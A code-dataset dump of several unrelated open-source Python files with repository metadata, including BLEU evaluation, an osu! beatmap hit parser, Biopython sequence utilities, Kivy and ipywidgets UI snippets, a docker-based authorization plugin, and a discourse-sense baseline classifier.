raise AssertionError('Gram format error!')
self.test_text = test_text
self.real_text = real_text
self.gram = [gram] if type(gram) == int else gram
self.sample_size = 200 # BLEU scores remain nearly unchanged for self.sample_size >= 200
self.reference = None
self.is_first = True
self.portion = portion # how many portions to use in the evaluation, default to use the whole test dataset
def get_score(self, is_fast=True, ignore=False, given_gram=None, fmt_str=True):
if ignore:
return 0
if self.is_first:
self.get_reference()
self.is_first = False
if is_fast:
return self.get_bleu_fast(given_gram, fmt_str)
return self.get_bleu(given_gram, fmt_str)
def get_reference(self):
reference = self.real_text.copy()
# randomly choose a portion of test data
# In-place shuffle
random.shuffle(reference)
len_ref = len(reference)
reference = reference[:int(self.portion * len_ref)]
self.reference = reference
return reference
def get_bleu(self, given_gram=None):
if given_gram is not None: # for single gram
bleu = list()
reference = self.get_reference()
weight = tuple((1. / given_gram for _ in range(given_gram)))
for idx, hypothesis in enumerate(self.test_text[:self.sample_size]):
bleu.append(self.cal_bleu(reference, hypothesis, weight))
return round(sum(bleu) / len(bleu), 3)
else: # for multiple gram
all_bleu = []
for ngram in self.gram:
bleu = list()
reference = self.get_reference()
weight = tuple((1. / ngram for _ in range(ngram)))
for idx, hypothesis in enumerate(self.test_text[:self.sample_size]):
bleu.append(self.cal_bleu(reference, hypothesis, weight))
all_bleu.append(round(sum(bleu) / len(bleu), 3))
return all_bleu
@staticmethod
def cal_bleu(reference, hypothesis, weight):
return nltk.translate.bleu_score.sentence_bleu(reference, hypothesis, weight,
smoothing_function=SmoothingFunction().method1)
def get_bleu_fast(self, given_gram=None):
reference = self.get_reference()
if given_gram is not None: # for single gram
return self.get_bleu_parallel(ngram=given_gram, reference=reference)
else: # for multiple gram
all_bleu = []
for ngram in self.gram:
all_bleu.append(self.get_bleu_parallel(ngram=ngram, reference=reference))
return all_bleu
def get_bleu_parallel(self, ngram, reference):
weight = tuple((1. / ngram for _ in range(ngram)))
pool = Pool(os.cpu_count())
result = list()
for idx, hypothesis in enumerate(self.test_text[:self.sample_size]):
result.append(pool.apply_async(self.cal_bleu, args=(reference, hypothesis, weight)))
score = 0.0
cnt = 0
for i in result:
score += i.get()
cnt += 1
pool.close()
pool.join()
return round(score / cnt, 3)
| 38.228571
| 115
| 0.601893
|
4a143fb5b870f72e25fe815ae6aacdd485326f46
| 1,362
|
py
|
Python
|
reamber/osu/OsuHit.py
|
Bestfast/reamberPy
|
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
|
[
"MIT"
] | null | null | null |
reamber/osu/OsuHit.py
|
Bestfast/reamberPy
|
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
|
[
"MIT"
] | null | null | null |
reamber/osu/OsuHit.py
|
Bestfast/reamberPy
|
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from dataclasses import dataclass
from reamber.base.Hit import Hit
from reamber.osu.OsuNoteMeta import OsuNoteMeta
@dataclass
class OsuHit(Hit, OsuNoteMeta):
@staticmethod
def readString(s: str, keys: int) -> OsuHit or None:
""" Reads a single line under the [Hitect] Label. This must explicitly be a Hit Object.
keys must be specified for conversion of code value to actual column."""
if s.isspace(): return None
sComma = s.split(",")
if len(sComma) < 5: return None
sColon = sComma[-1].split(":")
if len(sColon) < 5: return None
this = OsuHit()
this.column = this.xAxisToColumn(int(sComma[0]), keys)
this.offset = int(sComma[2])
this.hitsoundSet = int(sComma[4])
this.sampleSet = int(sColon[0])
this.additionSet = int(sColon[1])
this.customSet = int(sColon[2])
this.volume = int(sColon[3])
this.hitsoundFile = sColon[4]
return this
def writeString(self, keys: int) -> str:
""" Exports a .osu writable string """
return f"{OsuNoteMeta.columnToXAxis(self.column, keys=keys)},{192}," \
f"{int(self.offset)},{1},{self.hitsoundSet},{self.sampleSet}:" \
f"{self.additionSet}:{self.customSet}:{self.volume}:{self.hitsoundFile}"
| 33.219512
| 95
| 0.624816
|
4a143fbcc356a30a6cf78caefc16ed74e7d0c683
| 2,371
|
py
|
Python
|
bionumpy/util.py
|
knutdrand/bionumpy
|
2a520ebfce19f346284bd5cf21d6197f6ba801ba
|
[
"MIT"
] | null | null | null |
bionumpy/util.py
|
knutdrand/bionumpy
|
2a520ebfce19f346284bd5cf21d6197f6ba801ba
|
[
"MIT"
] | null | null | null |
bionumpy/util.py
|
knutdrand/bionumpy
|
2a520ebfce19f346284bd5cf21d6197f6ba801ba
|
[
"MIT"
] | 1
|
2022-03-07T21:58:03.000Z
|
2022-03-07T21:58:03.000Z
|
import numpy as np
import logging
from npstructures import RaggedArray
from .chromosome_map import ChromosomeMap
logger = logging.getLogger(__name__)
@ChromosomeMap()
def filter_on_intervals(entry, sorted_intervals):
if len(sorted_intervals) == 0:
mask = np.full(entry.position.shape, False)
else:
starts, ends = (sorted_intervals.start, sorted_intervals.end)
idx = np.searchsorted(starts, entry.position, side="right") - 1
idx = np.minimum(idx, starts.size - 1)
mask = (entry.position >= starts[idx]) & (entry.position < ends[idx])
return entry[mask]
@ChromosomeMap()
def get_snps(variants):
snps = variants[variants.is_snp()]
snps.ref_seq = snps.ref_seq.ravel()
snps.alt_seq = snps.alt_seq.ravel()
return snps
def convolution(func):
def new_func(_sequence, window_size, *args, **kwargs):
shape, sequence = (_sequence.shape, _sequence.ravel())
convoluted = func(sequence, window_size, *args, **kwargs)
if isinstance(_sequence, RaggedArray):
out = RaggedArray(convoluted, shape)
elif isinstance(_sequence, np.ndarray):
out = np.lib.stride_tricks.as_strided(convoluted, shape)
return out[..., : (-window_size + 1)]
return new_func
def rolling_window_function(func):
def new_func(_sequence, window_size, *args, **kwargs):
shape, sequence = (_sequence.shape, _sequence.ravel())
print(sequence, window_size)
windows = np.lib.stride_tricks.sliding_window_view(sequence, window_size)
convoluted = func(windows, window_size, *args, **kwargs)
if isinstance(_sequence, RaggedArray):
out = RaggedArray(convoluted, shape)
elif isinstance(_sequence, np.ndarray):
out = np.lib.stride_tricks.as_strided(convoluted, shape)
return out[..., : (-window_size + 1)]
return new_func
def pprint_one(sequence):
return "".join(chr(c) for c in sequence)
def pprint(sequences):
if isinstance(sequences, RaggedArray):
return [pprint_one(s) for s in sequences]
elif isinstance(sequences, np.ndarray):
if len(sequences.shape) == 1:
return pprint_one(sequences)
return [pprint(s) for s in sequences]
def plot(obj):
if not hasattr(obj, "__plot__"):
logger.warning(f"{obj} has no __plot__ method")
| 32.479452
| 81
| 0.668494
|
4a143fe232ec9355b36a907bea6943db4ca12fb3
| 14,510
|
py
|
Python
|
Bio/SeqUtils/__init__.py
|
ntamas/biopython
|
ff12c3dd533274678113ecdbd88b0136fb77e565
|
[
"PostgreSQL"
] | 1
|
2022-01-18T22:33:06.000Z
|
2022-01-18T22:33:06.000Z
|
Bio/SeqUtils/__init__.py
|
ntamas/biopython
|
ff12c3dd533274678113ecdbd88b0136fb77e565
|
[
"PostgreSQL"
] | null | null | null |
Bio/SeqUtils/__init__.py
|
ntamas/biopython
|
ff12c3dd533274678113ecdbd88b0136fb77e565
|
[
"PostgreSQL"
] | null | null | null |
#!/usr/bin/env python
# Created: Wed May 29 08:07:18 2002
# thomas@cbs.dtu.dk, Cecilia.Alsmark@ebc.uu.se
# Copyright 2001 by Thomas Sicheritz-Ponten and Cecilia Alsmark.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Miscellaneous functions for dealing with sequences."""
from __future__ import print_function
import re
from math import pi, sin, cos
from Bio.Seq import Seq
from Bio.Alphabet import IUPAC
from Bio.Data import IUPACData
######################################
# DNA
######################
# {{{
def GC(seq):
"""Calculates G+C content, returns the percentage (float between 0 and 100).
Copes mixed case sequences, and with the ambiguous nucleotide S (G or C)
when counting the G and C content. The percentage is calculated against
the full length, e.g.:
>>> from Bio.SeqUtils import GC
>>> GC("ACTGN")
40.0
Note that this will return zero for an empty sequence.
"""
try:
gc = sum(map(seq.count, ['G', 'C', 'g', 'c', 'S', 's']))
return gc*100.0/len(seq)
except ZeroDivisionError:
return 0.0
def GC123(seq):
"""Calculates total G+C content plus first, second and third positions.
Returns a tuple of four floats (percentages between 0 and 100) for the
entire sequence, and the three codon positions. e.g.
>>> from Bio.SeqUtils import GC123
>>> GC123("ACTGTN")
(40.0, 50.0, 50.0, 0.0)
Copes with mixed case sequences, but does NOT deal with ambiguous
nucleotides.
"""
d= {}
for nt in ['A', 'T', 'G', 'C']:
d[nt] = [0, 0, 0]
for i in range(0, len(seq), 3):
codon = seq[i:i+3]
if len(codon) < 3:
codon += ' '
for pos in range(0, 3):
for nt in ['A', 'T', 'G', 'C']:
if codon[pos] == nt or codon[pos] == nt.lower():
d[nt][pos] += 1
gc = {}
gcall = 0
nall = 0
for i in range(0, 3):
try:
n = d['G'][i] + d['C'][i] +d['T'][i] + d['A'][i]
gc[i] = (d['G'][i] + d['C'][i])*100.0/n
except:
gc[i] = 0
gcall = gcall + d['G'][i] + d['C'][i]
nall = nall + n
gcall = 100.0*gcall/nall
return gcall, gc[0], gc[1], gc[2]
def GC_skew(seq, window=100):
"""Calculates GC skew (G-C)/(G+C) for multiple windows along the sequence.
Returns a list of ratios (floats), controlled by the length of the sequence
and the size of the window.
Does NOT look at any ambiguous nucleotides.
"""
# 8/19/03: Iddo: added lowercase
values = []
for i in range(0, len(seq), window):
s = seq[i: i + window]
g = s.count('G') + s.count('g')
c = s.count('C') + s.count('c')
skew = (g-c)/float(g+c)
values.append(skew)
return values
def xGC_skew(seq, window=1000, zoom=100,
r=300, px=100, py=100):
"""Calculates and plots normal and accumulated GC skew (GRAPHICS !!!)."""
from Tkinter import Scrollbar, Canvas, BOTTOM, BOTH, ALL, \
VERTICAL, HORIZONTAL, RIGHT, LEFT, X, Y
yscroll = Scrollbar(orient=VERTICAL)
xscroll = Scrollbar(orient=HORIZONTAL)
canvas = Canvas(yscrollcommand=yscroll.set,
xscrollcommand=xscroll.set, background='white')
win = canvas.winfo_toplevel()
win.geometry('700x700')
yscroll.config(command=canvas.yview)
xscroll.config(command=canvas.xview)
yscroll.pack(side=RIGHT, fill=Y)
xscroll.pack(side=BOTTOM, fill=X)
canvas.pack(fill=BOTH, side=LEFT, expand=1)
canvas.update()
X0, Y0 = r + px, r + py
x1, x2, y1, y2 = X0 - r, X0 + r, Y0 - r, Y0 + r
ty = Y0
canvas.create_text(X0, ty, text='%s...%s (%d nt)' % (seq[:7], seq[-7:], len(seq)))
ty += 20
canvas.create_text(X0, ty, text='GC %3.2f%%' % (GC(seq)))
ty += 20
canvas.create_text(X0, ty, text='GC Skew', fill='blue')
ty += 20
canvas.create_text(X0, ty, text='Accumulated GC Skew', fill='magenta')
ty += 20
canvas.create_oval(x1, y1, x2, y2)
acc = 0
start = 0
for gc in GC_skew(seq, window):
r1 = r
acc += gc
# GC skew
alpha = pi - (2*pi*start)/len(seq)
r2 = r1 - gc*zoom
x1 = X0 + r1 * sin(alpha)
y1 = Y0 + r1 * cos(alpha)
x2 = X0 + r2 * sin(alpha)
y2 = Y0 + r2 * cos(alpha)
canvas.create_line(x1, y1, x2, y2, fill='blue')
# accumulated GC skew
r1 = r - 50
r2 = r1 - acc
x1 = X0 + r1 * sin(alpha)
y1 = Y0 + r1 * cos(alpha)
x2 = X0 + r2 * sin(alpha)
y2 = Y0 + r2 * cos(alpha)
canvas.create_line(x1, y1, x2, y2, fill='magenta')
canvas.update()
start += window
canvas.configure(scrollregion=canvas.bbox(ALL))
def molecular_weight(seq):
"""Calculate the molecular weight of a DNA sequence."""
if isinstance(seq, str):
seq = Seq(seq, IUPAC.unambiguous_dna)
weight_table = IUPACData.unambiguous_dna_weights
return sum(weight_table[x] for x in seq)
def nt_search(seq, subseq):
"""Search for a DNA subseq in sequence.
use ambiguous values (like N = A or T or C or G, R = A or G etc.)
searches only on forward strand
"""
pattern = ''
for nt in subseq:
value = IUPACData.ambiguous_dna_values[nt]
if len(value) == 1:
pattern += value
else:
pattern += '[%s]' % value
pos = -1
result = [pattern]
l = len(seq)
while True:
pos += 1
s = seq[pos:]
m = re.search(pattern, s)
if not m:
break
pos += int(m.start(0))
result.append(pos)
return result
# }}}
######################################
# Protein
######################
# {{{
def seq3(seq, custom_map={'*': 'Ter'}, undef_code='Xaa'):
"""Turn a one letter code protein sequence into one with three letter codes.
The single input argument 'seq' should be a protein sequence using single
letter codes, either as a python string or as a Seq or MutableSeq object.
This function returns the amino acid sequence as a string using the three
letter amino acid codes. Output follows the IUPAC standard (including
ambiguous characters B for "Asx", J for "Xle" and X for "Xaa", and also U
for "Sel" and O for "Pyl") plus "Ter" for a terminator given as an asterisk.
Any unknown character (including possible gap characters), is changed into
'Xaa'.
e.g.
>>> from Bio.SeqUtils import seq3
>>> seq3("MAIVMGRWKGAR*")
'MetAlaIleValMetGlyArgTrpLysGlyAlaArgTer'
You can set a custom translation of the codon termination code using the
"custom_map" argument, e.g.
>>> seq3("MAIVMGRWKGAR*", custom_map={"*": "***"})
'MetAlaIleValMetGlyArgTrpLysGlyAlaArg***'
You can also set a custom translation for non-amino acid characters, such
as '-', using the "undef_code" argument, e.g.
>>> seq3("MAIVMGRWKGA--R*", undef_code='---')
'MetAlaIleValMetGlyArgTrpLysGlyAla------ArgTer'
If not given, "undef_code" defaults to "Xaa", e.g.
>>> seq3("MAIVMGRWKGA--R*")
'MetAlaIleValMetGlyArgTrpLysGlyAlaXaaXaaArgTer'
This function was inspired by BioPerl's seq3.
"""
# not doing .update() on IUPACData dict with custom_map dict
# to preserve its initial state (may be imported in other modules)
threecode = dict(IUPACData.protein_letters_1to3_extended.items() +
custom_map.items())
#We use a default of 'Xaa' for undefined letters
#Note this will map '-' to 'Xaa' which may be undesirable!
return ''.join([threecode.get(aa, undef_code) for aa in seq])
def seq1(seq, custom_map={'Ter': '*'}, undef_code='X'):
"""Turns a three-letter code protein sequence into one with single letter codes.
The single input argument 'seq' should be a protein sequence using three-
letter codes, either as a python string or as a Seq or MutableSeq object.
This function returns the amino acid sequence as a string using the one
letter amino acid codes. Output follows the IUPAC standard (including
ambiguous characters "B" for "Asx", "J" for "Xle", "X" for "Xaa", "U" for
"Sel", and "O" for "Pyl") plus "*" for a terminator given the "Ter" code.
Any unknown character (including possible gap characters), is changed into
'-'.
e.g.
>>> from Bio.SeqUtils import seq3
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAlaArgTer")
'MAIVMGRWKGAR*'
The input is case insensitive, e.g.
>>> from Bio.SeqUtils import seq3
>>> seq1("METalaIlEValMetGLYArgtRplysGlyAlaARGTer")
'MAIVMGRWKGAR*'
You can set a custom translation of the codon termination code using the
"custom_map" argument, e.g.
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAlaArg***", custom_map={"***": "*"})
'MAIVMGRWKGAR*'
You can also set a custom translation for non-amino acid characters, such
as '-', using the "undef_code" argument, e.g.
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAla------ArgTer", undef_code='?')
'MAIVMGRWKGA??R*'
If not given, "undef_code" defaults to "X", e.g.
>>> seq1("MetAlaIleValMetGlyArgTrpLysGlyAla------ArgTer")
'MAIVMGRWKGAXXR*'
"""
# reverse map of threecode
# upper() on all keys to enable caps-insensitive input seq handling
onecode = dict((k.upper(), v) for k, v in
IUPACData.protein_letters_3to1_extended.items())
# add the given termination codon code and custom maps
onecode.update((k.upper(), v) for (k, v) in custom_map.iteritems())
seqlist = [seq[3*i:3*(i+1)] for i in range(len(seq) // 3)]
return ''.join([onecode.get(aa.upper(), undef_code) for aa in seqlist])
# }}}
######################################
# Mixed ???
######################
# {{{
def six_frame_translations(seq, genetic_code=1):
"""Formatted string showing the 6 frame translations and GC content.
nice looking 6 frame translation with GC content - code from xbbtools
similar to DNA Striders six-frame translation
>>> from Bio.SeqUtils import six_frame_translations
>>> print(six_frame_translations("AUGGCCAUUGUAAUGGGCCGCUGA"))
GC_Frame: a:5 t:0 g:8 c:5
Sequence: auggccauug ... gggccgcuga, 24 nt, 54.17 %GC
<BLANKLINE>
<BLANKLINE>
1/1
G H C N G P L
W P L * W A A
M A I V M G R *
auggccauuguaaugggccgcuga 54 %
uaccgguaacauuacccggcgacu
A M T I P R Q
H G N Y H A A S
P W Q L P G S
<BLANKLINE>
<BLANKLINE>
"""
from Bio.Seq import reverse_complement, translate
anti = reverse_complement(seq)
comp = anti[::-1]
length = len(seq)
frames = {}
for i in range(0, 3):
fragment_length = 3 * ((length-i) // 3)
frames[i+1] = translate(seq[i:i+fragment_length], genetic_code)
frames[-(i+1)] = translate(anti[i:i+fragment_length], genetic_code)[::-1]
# create header
if length > 20:
short = '%s ... %s' % (seq[:10], seq[-10:])
else:
short = seq
header = 'GC_Frame: '
for nt in ['a', 't', 'g', 'c']:
header += '%s:%d ' % (nt, seq.count(nt.upper()))
header += '\nSequence: %s, %d nt, %0.2f %%GC\n\n\n' % (short.lower(), length, GC(seq))
res = header
for i in range(0, length, 60):
subseq = seq[i:i+60]
csubseq = comp[i:i+60]
p = i//3
res += '%d/%d\n' % (i+1, i/3+1)
res += ' ' + ' '.join(map(None, frames[3][p:p+20])) + '\n'
res += ' ' + ' '.join(map(None, frames[2][p:p+20])) + '\n'
res += ' '.join(map(None, frames[1][p:p+20])) + '\n'
# seq
res += subseq.lower() + '%5d %%\n' % int(GC(subseq))
res += csubseq.lower() + '\n'
# - frames
res += ' '.join(map(None, frames[-2][p:p+20])) +' \n'
res += ' ' + ' '.join(map(None, frames[-1][p:p+20])) + '\n'
res += ' ' + ' '.join(map(None, frames[-3][p:p+20])) + '\n\n'
return res
# }}}
######################################
# FASTA file utilities
######################
# {{{
def quick_FASTA_reader(file):
"""Simple FASTA reader, returning a list of string tuples (OBSOLETE).
The single argument 'file' should be the filename of a FASTA format file.
This function will open and read in the entire file, constructing a list
of all the records, each held as a tuple of strings (the sequence name or
title, and its sequence).
>>> seqs = quick_FASTA_reader("Fasta/dups.fasta")
>>> for title, sequence in seqs:
... print("%s %s" % (title, sequence))
alpha ACGTA
beta CGTC
gamma CCGCC
alpha (again - this is a duplicate entry to test the indexing code) ACGTA
delta CGCGC
This function was is fast, but because it returns the data as a single in
memory list, is unsuitable for large files where an iterator approach is
preferable.
You are generally encouraged to use Bio.SeqIO.parse(handle, "fasta") which
allows you to iterate over the records one by one (avoiding having all the
records in memory at once). Using Bio.SeqIO also makes it easy to switch
between different input file formats. However, please note that rather
than simple strings, Bio.SeqIO uses SeqRecord objects for each record.
If you want to use simple strings, use the function SimpleFastaParser
added to Bio.SeqIO.FastaIO in Biopython 1.61 instead.
"""
handle = open(file)
entries = []
from Bio.SeqIO.FastaIO import SimpleFastaParser
for title, sequence in SimpleFastaParser(handle):
entries.append((title, sequence))
handle.close()
return entries
# }}}
def _test():
"""Run the module's doctests (PRIVATE)."""
import os
import doctest
if os.path.isdir(os.path.join("..", "Tests")):
print("Running doctests...")
cur_dir = os.path.abspath(os.curdir)
os.chdir(os.path.join("..", "Tests"))
doctest.testmod()
os.chdir(cur_dir)
del cur_dir
print("Done")
elif os.path.isdir(os.path.join("Tests")):
print("Running doctests...")
cur_dir = os.path.abspath(os.curdir)
os.chdir(os.path.join("Tests"))
doctest.testmod()
os.chdir(cur_dir)
del cur_dir
print("Done")
if __name__ == "__main__":
_test()
| 31.681223
| 90
| 0.594693
|
4a143ff074b55a07a287b8c48f93e79774b7ef21
| 1,073
|
py
|
Python
|
screen.py
|
gugus1974/thermostat_v4
|
9666889e8589318bb85e6125a72f7556696628f3
|
[
"MIT"
] | 1
|
2018-06-11T16:56:00.000Z
|
2018-06-11T16:56:00.000Z
|
screen.py
|
gugus1974/thermostat_v4
|
9666889e8589318bb85e6125a72f7556696628f3
|
[
"MIT"
] | 7
|
2017-11-28T08:00:03.000Z
|
2018-02-05T06:03:47.000Z
|
screen.py
|
gugus1974/thermostat_v4
|
9666889e8589318bb85e6125a72f7556696628f3
|
[
"MIT"
] | 2
|
2017-11-29T08:52:46.000Z
|
2019-10-09T16:53:34.000Z
|
from kivy.app import App
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager, Screen
# Create both screens. Please note the root.manager.current: this is how
# you can control the ScreenManager from kv. Each screen has by default a
# property manager that gives you the instance of the ScreenManager used.
Builder.load_string("""
<MenuScreen>:
BoxLayout:
Button:
text: 'Goto settings'
on_press: root.manager.current = 'settings'
Button:
text: 'Quit'
<SettingsScreen>:
BoxLayout:
Button:
text: 'My settings button'
Button:
text: 'Back to menu'
on_press: root.manager.current = 'menu'
""")
# Declare both screens
class MenuScreen(Screen):
pass
class SettingsScreen(Screen):
pass
# Create the screen manager
sm = ScreenManager()
sm.add_widget(MenuScreen(name='menu'))
sm.add_widget(SettingsScreen(name='settings'))
class TestApp(App):
def build(self):
return sm
if __name__ == '__main__':
TestApp().run()
| 23.844444
| 73
| 0.666356
|
4a1441c9dda394596cc16c0f1bcdce463cb37e5a
| 2,332
|
py
|
Python
|
moonv4/moon_orchestrator/conf/plugins/authz.py
|
hashnfv/hashnfv-moon
|
daaba34fa2ed4426bc0fde359e54a5e1b872208c
|
[
"Apache-2.0"
] | null | null | null |
moonv4/moon_orchestrator/conf/plugins/authz.py
|
hashnfv/hashnfv-moon
|
daaba34fa2ed4426bc0fde359e54a5e1b872208c
|
[
"Apache-2.0"
] | null | null | null |
moonv4/moon_orchestrator/conf/plugins/authz.py
|
hashnfv/hashnfv-moon
|
daaba34fa2ed4426bc0fde359e54a5e1b872208c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Open Platform for NFV Project, Inc. and its contributors
# This software is distributed under the terms and conditions of the 'Apache-2.0'
# license which can be found in the file 'LICENSE' in this package distribution
# or at 'http://www.apache.org/licenses/LICENSE-2.0'.
import os
import time
import hashlib
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from moon_orchestrator.dockers import DockerBase
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
DOMAIN = "moon_orchestrator"
__CWD__ = os.path.dirname(os.path.abspath(__file__))
# TODO (asteroide): select the right template folder
TEMPLATES_FOLDER = os.path.join(__CWD__, "..", "conf", "dockers")
# TODO (asteroide): add specific configuration options for that plugin
class AuthzFunction(DockerBase):
id = "moon_authz_function"
__build = """RUN mkdir -p /etc/moon/
COPY conf /etc/moon/
ADD dist/{py_pkg}.tar.gz /root
WORKDIR /root/{py_pkg}
RUN pip3 install -r requirements.txt
RUN pip3 install .
"""
def __init__(self, uuid, conf_file="", docker=None, network_config=None):
self.id = "authz_"+hashlib.sha224(uuid.encode("utf-8")).hexdigest()
super(AuthzFunction, self).__init__(
name="moon_authz",
run_cmd=["python3", "-m", "moon_authz", uuid],
conf_file=conf_file,
docker=docker,
network_config=network_config,
build_cmd=self.__build,
id=self.id,
tag=""
# tag=CONF.security_function.container
)
# note(asteroide): time to let the new docker boot
time.sleep(3)
# self.get_status()
def get_status(self):
return True
# transport = oslo_messaging.get_transport(CONF)
# target = oslo_messaging.Target(topic=self.id, version='1.0')
# client = oslo_messaging.RPCClient(transport, target)
# LOG.info("Calling Status on {}".format(self.id))
# ret = client.call({"component_id": self.id}, 'get_status', args=None)
# LOG.info(ret)
# return ret
def run(uuid, conf_file="", docker=None, network_config=None):
return AuthzFunction(uuid,
conf_file=conf_file,
docker=docker,
network_config=network_config)
| 34.294118
| 81
| 0.657804
|
4a144365c47d9def222fd8efbddd6756f3f179c4
| 2,510
|
py
|
Python
|
architectures/conll16st-hd-sdp/sup_parser_baseline_random.py
|
jimmycallin/master-thesis
|
5d30df288478ca944338eba353cbc2b84f415ee0
|
[
"MIT"
] | 2
|
2016-06-21T12:34:23.000Z
|
2017-05-23T18:34:53.000Z
|
architectures/conll16st-hd-sdp/sup_parser_baseline_random.py
|
jimmycallin/master-thesis
|
5d30df288478ca944338eba353cbc2b84f415ee0
|
[
"MIT"
] | null | null | null |
architectures/conll16st-hd-sdp/sup_parser_baseline_random.py
|
jimmycallin/master-thesis
|
5d30df288478ca944338eba353cbc2b84f415ee0
|
[
"MIT"
] | 1
|
2020-06-17T14:07:50.000Z
|
2020-06-17T14:07:50.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Sample Discourse Relation Classifier
ready for evaluation on TIRA evaluation system (supplementary evaluation)
The parse should take three arguments
$inputDataset = the folder of the dataset to parse.
The folder structure is the same as in the tar file
$inputDataset/parses.json
$inputDataset/relations-no-senses.json
$inputRun = the folder that contains the word2vec_model file or other resources
$outputDir = the folder that the parser will output 'output.json' to
Note that we have to fill in 'Type' field as Explicti and Implicit,
but that will be overridden by the evaluator.
"""
import codecs
import json
import random
import sys
import validator
class DiscourseParser(object):
"""Sample discourse relation sense classifier
This simply classifies each instance randomly.
"""
def __init__(self):
pass
def classify_sense(self, data_dir, output_dir, valid_senses):
relation_file = '%s/relations-no-senses.json' % data_dir
parse_file = '%s/parses.json' % data_dir
parse = json.load(codecs.open(parse_file, encoding='utf8'))
relation_dicts = [json.loads(x) for x in open(relation_file)]
output = codecs.open('%s/output.json' % output_dir, 'wb', encoding ='utf8')
random.seed(10)
for i, relation_dict in enumerate(relation_dicts):
sense = valid_senses[random.randint(0, len(valid_senses)-1)]
relation_dict['Sense'] = [sense]
relation_dict['Arg1']['TokenList'] = \
[x[2] for x in relation_dict['Arg1']['TokenList']]
relation_dict['Arg2']['TokenList'] = \
[x[2] for x in relation_dict['Arg2']['TokenList']]
relation_dict['Connective']['TokenList'] = \
[x[2] for x in relation_dict['Connective']['TokenList']]
if len(relation_dict['Connective']['TokenList']) > 0:
relation_dict['Type'] = 'Explicit'
else:
relation_dict['Type'] = 'Implicit'
output.write(json.dumps(relation_dict) + '\n')
if __name__ == '__main__':
language = sys.argv[1]
input_dataset = sys.argv[2]
input_run = sys.argv[3]
output_dir = sys.argv[4]
if language == 'en':
valid_senses = validator.EN_SENSES
elif language == 'zh':
valid_senses = validator.ZH_SENSES
parser = DiscourseParser()
parser.classify_sense(input_dataset, output_dir, valid_senses)
| 34.383562
| 83
| 0.65259
|
4a14439cdf2813be11801d9dcc0b2b7c66c31466
| 26
|
py
|
Python
|
bin/dynatrace/dcrum/__init__.py
|
Dynatrace/DCRUM-Splunk-Application
|
ae6f5f766750bfc56d2c31d75256320341b50f35
|
[
"BSD-3-Clause"
] | 2
|
2016-06-20T02:02:34.000Z
|
2021-12-15T12:07:51.000Z
|
bin/dynatrace/dcrum/__init__.py
|
Dynatrace/DCRUM-Splunk-Application
|
ae6f5f766750bfc56d2c31d75256320341b50f35
|
[
"BSD-3-Clause"
] | null | null | null |
bin/dynatrace/dcrum/__init__.py
|
Dynatrace/DCRUM-Splunk-Application
|
ae6f5f766750bfc56d2c31d75256320341b50f35
|
[
"BSD-3-Clause"
] | 2
|
2020-01-20T04:36:55.000Z
|
2021-03-24T08:00:11.000Z
|
__author__ = 'cwpl-khoja'
| 13
| 25
| 0.730769
|
4a14440b8a32ae6d5f4530fbb5a381af22b54f89
| 308
|
py
|
Python
|
Algorithms/Sorting/The_Full_Counting_Sort.py
|
gauthamkrishna-g/HackerRank
|
472d7a56fc1c1c4f8f03fcabc09d08da4000efde
|
[
"MIT"
] | 1
|
2017-12-02T14:23:44.000Z
|
2017-12-02T14:23:44.000Z
|
Algorithms/Sorting/The_Full_Counting_Sort.py
|
gauthamkrishna-g/HackerRank
|
472d7a56fc1c1c4f8f03fcabc09d08da4000efde
|
[
"MIT"
] | null | null | null |
Algorithms/Sorting/The_Full_Counting_Sort.py
|
gauthamkrishna-g/HackerRank
|
472d7a56fc1c1c4f8f03fcabc09d08da4000efde
|
[
"MIT"
] | null | null | null |
n = int(input())
ar = [[] for _ in range(100)]
for i in range(n):
integer, string = input().strip().split(' ')
integer = int(integer)
if i < n//2:
string = '-'
ar[integer].append(string)
#print (ar)
print (' '.join([string for equal_string in ar for string in equal_string]))
| 30.8
| 76
| 0.577922
|
4a14441e2a7288c740482b5aab6584b0548187c3
| 1,317
|
py
|
Python
|
gwidgets.py
|
AstroPix/ATLASPix
|
752fb5d6287efea7a7a2fc72e2925c8c940b4665
|
[
"MIT"
] | null | null | null |
gwidgets.py
|
AstroPix/ATLASPix
|
752fb5d6287efea7a7a2fc72e2925c8c940b4665
|
[
"MIT"
] | null | null | null |
gwidgets.py
|
AstroPix/ATLASPix
|
752fb5d6287efea7a7a2fc72e2925c8c940b4665
|
[
"MIT"
] | 1
|
2020-03-19T17:17:35.000Z
|
2020-03-19T17:17:35.000Z
|
import traitlets
from ipywidgets import widgets
from IPython.display import display
from tkinter import Tk, filedialog
class SelectFilesButton(widgets.Button):
"""A file widget that leverages tkinter.filedialog."""
def __init__(self):
super(SelectFilesButton, self).__init__()
# Add the selected_files trait
self.add_traits(files=traitlets.traitlets.List())
# Create the button.
self.description = "Select Files"
self.icon = "square-o"
self.style.button_color = "gray"
# Set on click behavior.
self.on_click(self.select_files)
@staticmethod
def select_files(b):
"""Generate instance of tkinter.filedialog.
Parameters
----------
b : obj:
An instance of ipywidgets.widgets.Button
"""
# Create Tk root
root = Tk()
# Hide the main window
root.withdraw()
# Raise the root to the top of all windows.
root.call('wm', 'attributes', '.', '-topmost', True)
# List of selected fileswill be set to b.value
b.files = filedialog.askopenfilename(multiple=True)
b.description = "Files Selected"
b.icon = "check-square-o"
b.style.button_color = "lightgreen"
| 31.357143
| 61
| 0.600607
|
4a14473e48dd7d21d740c225a8aa0a349b22cd85
| 4,719
|
py
|
Python
|
keystone/common/request.py
|
Afkupuz/4jaewoo
|
fc69258feac7858f5af99d2feab39c86ceb70203
|
[
"Apache-2.0"
] | 1
|
2019-05-08T06:09:35.000Z
|
2019-05-08T06:09:35.000Z
|
keystone/common/request.py
|
Afkupuz/4jaewoo
|
fc69258feac7858f5af99d2feab39c86ceb70203
|
[
"Apache-2.0"
